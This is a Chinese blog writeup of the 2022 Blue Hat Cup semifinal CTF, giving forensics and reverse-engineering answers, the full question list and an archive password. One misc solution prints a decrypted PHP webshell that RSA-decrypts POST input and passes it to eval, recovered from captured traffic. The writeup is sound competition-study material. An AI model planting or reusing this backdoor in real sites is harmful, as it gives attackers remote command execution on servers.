蓝帽杯2022年半决赛 writeup(附取证题目+解压密码+附件)

最新推荐文章于 2023-12-26 13:09:11 发布
最新推荐文章于 2023-12-26 13:09:11 发布
阅读量9.1k 收藏 27
点赞数 11
分类专栏: ctf 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42880719/article/details/126175056
版权

文章目录


文末附取证附件、题目、解压密码

电子取证

手机取证_1

在这里插入图片描述

手机取证_2

去看了蓝信的视频,在info.plist

在这里插入图片描述

然后+8

2022-01-11 18:47:38

exe分析_1

在这里插入图片描述

密码virus,然后开始面向微步做题

在这里插入图片描述

C:\Program Files\Common Files\Services\WmiApSvr.exe

exe分析_2

直接搜看看有没有

在这里插入图片描述

exe分析_3

在这里插入图片描述

svchost.exe

exe分析_4

在这里插入图片描述

挖矿

exe分析_5

win7显示的不对,win10那里看

在这里插入图片描述
韩国

apk分析_01

hhh,题目问EXEC结果要交红星的
在这里插入图片描述

apk分析_02

在这里插入图片描述

解base得到https://ansjk.ecxeio.xyz

答案:ansjk.ecxeio.xyz

apk分析_05

和初赛一个附件。不用说了

在这里插入图片描述

apk分析_06

直接搜关键词“安全”出答案

在这里插入图片描述

apk分析_07

在这里插入图片描述

猜的,4和3。答案3,本界面、广告界面、旁边的那个跳转界面。一共3个

apk分析_08

在这里插入图片描述

搜com.

在这里插入图片描述

在这里插入图片描述

apk分析_09

info.plist

在这里插入图片描述

d395159c291c627c9d4ff9139bf8f0a700b98732

apk分析_10

info.plist

在这里插入图片描述

在这里插入图片描述

全选

apk分析_11

在这里插入图片描述

www.nansjy.com.cn:8161

apk分析_12

在这里插入图片描述

com.example.weisitas526sad.activity.SplashActivity

apk分析_14

哈哈哈哈哈哈哈哈哈哈哈哈哈哈结束之前猜的红星

答案:红星

apk分析_15

即可找到明文username和md5加密后的password

在这里插入图片描述

17317289056/b12345678b

服务器取证_05

猜了5不对,猜6对了

Re

babynim

在这里插入图片描述

追到NimMainModule()

在这里插入图片描述

对比flag格式

在这里插入图片描述

取36位。

在这里插入图片描述

追进去

在这里插入图片描述

是个做乘法的操作,input * a = b

那么b // a == flag

print(51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801//56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471)
#923973256239481267349126498121231231

flag{923973256239481267349126498121231231}

Misc

神秘的日志

与ntlm有关的事件id 6038

交了五六十个,最后居然是成功后的第一次登录

直接麻了

system里

在这里插入图片描述

时间对应security第一次的登录时间

在这里插入图片描述

在这里插入图片描述

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

流量包,能发现传输hex之后多了个rsa.php,因此那串hex就是rsa.php,使用cyberchef给dump下来

在这里插入图片描述

Www.PHPJiaMi.Com

当时还以为是后面错误所以乱码了,看来不是

在这里插入图片描述

官方没有解密的

https://m.php.cn/blog/detail/20670.html

https://blog.csdn.net/qq292913477/article/details/88726944

使用第二个链接的脚本解,得到以下

<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
echo $pk;
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd);

em,后面传输了rsa的参数,将最后的eval改成echo,cmd直接改成参数。发现一共传了三个参,其中第一个是蚁剑的,第二个就是传输的东西。发现第4次出现的rsa.php最大

在这里插入图片描述

第二条

<?php
$cmd = "yLxWGRCHJBEhtpnW7XTEjZa8U06pkFvEqTea5ISI/LggnmMXPblFZ6sDNJHoym6I0CkQIYr62+8sauFSYOHtPEpFX62kBmMAxi7abHOzQl5FAf2VO5wiezcXRp5nLDfqHCLa0Y8T9kaplu81yXLzXtlhZYgrqMtDsFROJ+ZKNN0=";
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
echo $pk;
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
echo($cmd);

在这里插入图片描述

熟悉的Zmxh

flag{844dfc86da23a4d5283907efaf9791ad}

取证附件、题目、解压密码

2022蓝帽杯取证题目+解压密码+附件
链接:https://pan.baidu.com/s/1AS0wVdjZxt46zaDcDzxdaQ
提取码:scpc
–来自百度网盘超级会员V4的分享

解压密码7(G?fu9A8sdgfMsfsdrfE4q6#cf7af0fc1c

手机取证_1
iPhone手机的iBoot固件版本号:(答案参考格式:iBoot-1.1.1)

手机取证_2
该手机制作完备份UTC+8的时间(非提取时间):(答案参考格式:2000-01-01 00:00:00)

exe分析_1
文件services.exe创建可执行文件的路径是:(答案参考格式:C:\Windows.exe)

exe分析_2
文件HackTool.FlyStudio.acz_unpack.exe是否调用了advapi32.dll动态函式链接库?
(是/否)

exe分析_3
文件aspnet_wp.v.exe执行后的启动的进程是什么:(答案参考格式:qax.exe)

exe分析_4
文件[4085034a23cccebefd374e4a77aea4f1]是什么类型的木马:(答案参考格式:勒索)

exe分析_5
文件[4085034a23cccebefd374e4a77aea4f1]网络连接的IP地址的归属地是哪个国家:(答案参考格式:美国)

APK分析_01
受害人手机中exec的序列号是:(答案参考格式:0xadc)

APK分析_02
受害人手机中exec关联服务器地址是:(答案参考格式:asd.as.d)

APK分析_03
受害人手机中exec加载服务器的函数是:(答案参考格式:asda)

APK分析_04
受害人手机中exec的打包ID是:(答案参考格式:adb.adb.cn)

APK分析_05
受害人手机中exec的是否有安全检测行为?
是/否

APK分析_06
受害人手机中exec的检测方法的完整路径和方法名是:(答案参考格式:a.a.a())

APK分析_07
受害人手机中exec有几个界面:(答案参考格式:2)

APK分析_08
受害人手机中红星IPA的包名是:(答案参考格式:a.s.d)

APK分析_09
受害人手机中红星IPA的APIKEY是:(答案参考格式:asd)

APK分析_10
受害人手机中红星IPA的权限有哪些?
[ 多选 ] 相册|定位|摄像头|麦克风

APK分析_11
嫌疑人手机中红星APK的服务器地址是:(答案参考格式:ass.a.d:11)

APK分析_12
嫌疑人手机中红星APK的程序入口是:(答案参考格式:a.v.b.n)

APK分析_13
嫌疑人手机中分析聊天工具,服务器的登录端口是:(答案参考格式:12)

APK分析_14
嫌疑人手机中分析聊天工具,用户归属的机构是:(答案参考格式:太阳)

APK分析_15
结合手机流量分析聊天工具的登录账号和密码是:(答案参考格式:1212311/12312asd)

服务器取证_01
服务器在启动时设置了运行时间同步脚本,请写出脚本内第二行内容。(答案参考格式:/abcd/tmp www.windows.com)

服务器取证_02
服务器在计划任务添加了备份数据库脚本,请写出该脚本的第二行内容。(答案参考格式:2022年第六届蓝帽杯)

服务器取证_03
使用宝塔linux面板的密码加密方式对字符串lanmaobei进行加密,写出加密结果。(答案参考格式:e10adc3949ba59abbe56e057f20f883e)

服务器取证_04
写出服务器中第一次登录宝塔面板的时间。(答案参考格式:2022-02-02 02:02:02)

服务器取证_05
写出宝塔面板的软件商店中已安装软件的个数(答案参考格式:2)

服务器取证_06
写出涉案网站(维斯塔斯)的运行目录路径。(答案参考格式:/root/etc/sssh/html)

服务器取证_07
写出最早访问涉案网站后台的IP地址。(答案参考格式:111.111.111.111)

服务器取证_08
写出涉案网站(维斯塔斯)的“系统版本”号。(答案参考格式:6.6.6666)

服务器取证_09
分析涉案网站的会员层级深度,写出最底层会员是多少层。(答案参考格式:66)

服务器取证_10
请写出存放网站会员等级变化制度的网站代码文件的SHA256值。(答案参考格式: 8d969eef6ecad3c29a3a629280e686cf0c3f5d5a86aff3ca12020c923adc6c92)

服务器取证_11
计算向网站中累计充值最多的五名会员,获得的下线收益总和(不包含平台赠送)。(答案参考格式:666.66)

服务器取证_12
统计涉案网站中余额大于0且银行卡开户行归属于四川省的潜在受害人数量。(答案参考格式:6)

服务器取证_13
统计平台从成立之初至“2021-07-01 23:59:59”共收益多少金额(不包含平台赠送)。(答案参考格式:6666.66)

服务器取证_14
统计涉案网站哪一天登录的会员人数最多。(答案参考格式:1999-09-09)

服务器取证_15
写出涉案网站中给客服发送“你好,怎么充值”的用户的fusername值。(答案参考格式:lanmaobei666)

是Mumuzi
关注
专栏目录
2023第七届蓝帽杯半决赛复现——取证部分
qq_73861475的博客
09-21 225
挂载检材打开检材中的logs.log文件,可以查看到开始提取的任务时间是 09-11 17:21。
2023蓝帽杯半决赛misc题目复现
lulu001128的博客
09-24 644
解题过程
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题
08-05
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)其他赛题
2022第六届蓝帽杯半决赛服务器取证部分wp
dazaogege的博客
10-11 1682
2022第六届蓝帽杯半决赛服务器取证部分wp
2022蓝帽杯半决赛
2202_75317918的博客
09-07 560
2022蓝帽杯半决赛
第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛
Pysnow's Blog
08-06 1683
总榜38,地区第四。
2022蓝帽杯wp
姜小孩的博客
07-10 1894
目录手机取证_1手机取证_2计算机取证_1计算机取证_2程序分析_1程序分析_2程序分析_3程序分析_4网站取证_1网站取证_2网站取证_3网站取证_4domainhacker这是这次比赛拿下的题,队名拆东墙砸西墙通过模糊搜索,搜索图片前面的字符:627604C2找到图片,下载,查看其分辨率为360x360通过模糊查询字符 '姜总', 找到在qq中的聊天记录其中提到明天有个快递抵达,讲述了单号获取内存文件的系统版本 获取用户的hash值 然后md5解密一下先列出所有进程 发现是MagnetRAM
2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022第三届“网鼎杯”网络...
2022第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件
09-19
2022第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022第三届“网鼎杯”网络安全大赛(白虎组)部分题目附件 2022第三届“网鼎杯”网络...
2022第三届“网鼎杯”网络安全大赛(朱雀组)部分题目附件
09-11
2022第三届“网鼎杯”网络安全大赛(朱雀组)部分题目附件
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup这篇技术文章详细分析了在buuctf平台上进行蓝帽杯web复盘的过程。文章内容主要围绕两个php源码文件,从反序列化漏洞、PHP数组整数溢出到open_basedir限制的绕过方法等多个知识点进行了...
2022蓝帽杯初赛wp
weixin_52829570的博客
07-10 856
第六届”蓝帽杯“全国大学生网络安全技能大赛初赛
蓝帽杯半决赛火炬木wp
wha1e的博客
08-07 431
蓝帽杯半决赛火炬木wp
蓝帽杯 2022 部分wp
blowed的博客
07-14 515
蓝帽杯
2022蓝帽杯半决赛电子取证(服务器部分)
xydsg的博客
11-27 246
解压密码7(G?
2021蓝帽杯总决赛wp
onl_llo的博客
08-30 1340
2021蓝帽杯总决赛wp pwn secretcode 程序分析 只允许open和read read的fd >= 0x14 shellcode的限制: 不能有00, 会被strcpy截断 调⽤shellcode时, rax r10执⾏shellcode 思路: 侧信道泄露flag 先多次open让flag对应的fd为0x14 然后read读⼊⽂件内容到rsp处 爆破[rsp+idx]处的字符, 如果为C, 则死循环, 否则就触发⼀个SIGV 细节: 构造"flag": mov eax, "fl
[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛
ZXW_NUDT的博客
08-05 3569
第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛
2022-第六届”蓝帽杯“全国大学生网络安全技能大赛 wp(WriteUp)
一位热爱网安的年轻人的博客
07-10 980
第六届”蓝帽杯“全国大学生网络安全技能大赛 wp
2023蓝帽杯半决赛 WP(Re&Crypto&Misc)
最新发布
qq_73505302的博客
12-26 240
大二上的第二次线下比赛,远赴哈尔滨,最终得到21名(队里少一名队友捏),可惜差一名进决赛,但愿可以作为明的铺垫吧。。。
蓝帽杯全国大学生网络安全技能大赛
08-24
蓝帽杯全国大学生网络安全技能大赛是一项面向全国大学生的网络安全竞赛。该比赛旨在提升大学生的网络安全技能和意识,促进网络安全人才的培养。比赛内容涵盖了各个领域的网络安全知识和技能,包括但不限于电子取证、加密通道、Web安全等方面。 该比赛提供了一系列赛题和附件,选手需要根据题目要求进行解答和实践。例如,电子取证赛题中,选手需要完成对手机取证的任务,通过分析附件中的数据和信息来获取所需的证据[2]。还有其他赛题如加密的通道和Web安全等,选手需要运用相关的知识和技能来解决问题。蓝帽杯全国大学生网络安全技能大赛为大学生提供了锻炼和展示自己网络安全能力的平台,也为培养网络安全人才作出了积极的贡献。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)](https://blog.csdn.net/ZXW_NUDT/article/details/126173643)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [[ CTF ]天机战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(初赛)](https://blog.csdn.net/ZXW_NUDT/article/details/125715546)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值